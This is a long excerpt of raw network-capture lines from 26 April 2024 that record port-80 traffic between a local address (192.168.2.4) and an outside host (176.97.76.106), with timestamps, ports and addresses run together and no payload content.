                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918315887 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918329000 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918340921 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918360949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918366909 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918399096 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918497086 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918509960 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918549061 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918584108 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918596983 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918622971 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918627024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918669939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918682098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918709040 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918720007 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918755054 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918771982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918783903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918795109 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918838978 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918843031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918855906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918891907 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918908119 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918920040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918941021 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918960094 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.918993950 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919013977 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919025898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919034958 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919049025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919059992 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919070959 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919092894 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919176102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919214010 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919229031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919301987 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919312954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919348955 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919362068 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919395924 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919410944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919428110 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919465065 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919487953 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919511080 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919539928 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919555902 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919591904 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919605017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919637918 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919642925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919655085 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919666052 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919678926 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919692039 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919708967 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919739962 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919770002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919781923 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919820070 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919831991 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919856071 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919886112 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919919014 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919955015 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.919969082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920006037 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920011997 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920020103 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920032024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920053959 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920068979 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920077085 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920093060 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920109034 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920149088 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920173883 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920236111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920277119 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920310974 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920325041 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920357943 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920603037 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920676947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920713902 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920857906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920876026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920907974 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920933008 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920947075 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.920984983 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921113968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921127081 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921154976 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921164989 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921168089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921196938 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921303988 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921346903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921380043 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921399117 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921442986 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921477079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921480894 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921536922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921566963 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921580076 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921580076 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921602964 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921610117 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921638966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921668053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921680927 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921681881 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921704054 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921713114 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921750069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.921792030 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:03.980036020 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.027606964 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.064487934 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.064547062 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.064564943 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.106086969 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.126980066 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.127038002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.127079964 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.127105951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.127165079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.127202988 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.127240896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.168570995 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.170855045 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.170909882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.170948982 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171026945 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171137094 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171173096 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171197891 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171274900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171310902 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171312094 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171437025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171473980 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171509027 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171592951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171627045 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171714067 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171763897 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.171799898 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172050953 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172152042 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172202110 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172235966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172296047 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172334909 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172367096 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172422886 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172461987 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172466993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172523022 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172559023 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172589064 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172646999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172681093 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172730923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172789097 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172828913 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172864914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172955990 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.172991991 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173027039 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173075914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173111916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173193932 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173269987 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173307896 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173326969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173460960 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173495054 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173562050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173652887 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173686028 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173722982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173832893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173871040 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173906088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.173990965 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174031973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174051046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174097061 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174145937 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174161911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174278021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174314022 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174339056 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174412012 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174453974 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174458981 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174515009 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174541950 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174556971 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174643040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174678087 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174715996 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174822092 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174858093 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174858093 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.174972057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175007105 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175031900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175143957 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175179005 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175206900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175282001 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175317049 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175335884 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175352097 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175384998 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175424099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175501108 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175539970 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175565004 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175627947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175666094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175704002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175802946 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175836086 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.175874949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176381111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176419020 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176439047 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176465034 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176498890 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176757097 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176944017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.176978111 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177067041 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177129984 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177162886 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177309036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177397013 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177433014 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177613974 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177779913 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177815914 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.177917004 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178023100 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178061008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178260088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178311110 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178345919 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178394079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178919077 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.178953886 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179008961 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179086924 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179121017 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179368019 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179529905 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179552078 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179598093 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179627895 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179668903 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179693937 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179737091 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179774046 CEST4973480192.168.2.4176.97.76.106
